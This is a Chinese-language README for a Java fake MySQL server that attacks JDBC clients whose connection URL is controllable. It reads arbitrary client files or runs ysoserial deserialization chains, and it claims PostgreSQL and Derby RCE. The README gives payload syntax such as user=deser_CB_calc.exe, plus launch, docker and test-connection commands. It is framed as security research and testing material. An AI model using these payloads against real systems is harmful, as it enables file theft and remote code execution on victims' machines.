该项目是 MySQL_Fake_Server 高级版
当JDBC URL可控时,特殊的MySQL服务端可以读取JDBC客户端任意文件或执行反序列化操作
完全使用Java实现部分MySQL协议,内置常见ysoserial链,一键启动,自动生成可用的payload用于测试
参考 MySQL_Fake_Server 项目,payload从user参数传递。反序列化应以deser_
开头,规则为deser_[gadget]_[cmd];文件读取以fileread_开头,规则为fileread_[name]
由于某些文件名或命令存在特殊字符,支持使用base64传递方式,方式为原有user基础上进行base64并以base64
开头,例如user=deser_CB_calc.exe等于user=base64ZGVzZXJfQ0JfY2FsYy5leGU=
默认文件保存在当前目录的fake-server-files下的当前时间戳目录内(自动创建目录)
注意:读文件功能遇到没有没有完整读取的情况,重新尝试即可完整读取
自从 0.0.3 版本以后支持了自定义反序列化 gadget 功能
自从 0.0.4 版本以后支持了 PostgreSQL RCE
自从 0.0.4 版本以后支持了 Apache Derby 基于 Slave 的 RCE
使用GUI版本一键启动,启动后可以根据自己的环境输入参数,生成payload
启动:java -jar fake-mysql-gui.jar
当你的环境不允许使用GUI版时,可以使用命令行版启动,同样可以使用GUI辅助生成payload
启动:java -jar fake-mysql-cli.jar -p [port]
构建:docker build -t fake-mysql-server .
启动:docker run -p 3306:3306 -d fake-mysql-server
怎样测试:
String url = "jdbc:mysql://...";
try {
Class.forName("com.mysql.jdbc.Driver");
// Class.forName("com.mysql.cj.jdbc.Driver");
DriverManager.getConnection(url);
} catch (Exception e) {
e.printStackTrace();
}本项目仅面向安全研究与学习,禁止任何非法用途
如您在使用本项目的过程中存在任何非法行为,您需自行承担相应后果
除非您已充分阅读、完全理解并接受本协议,否则,请您不要使用本项目





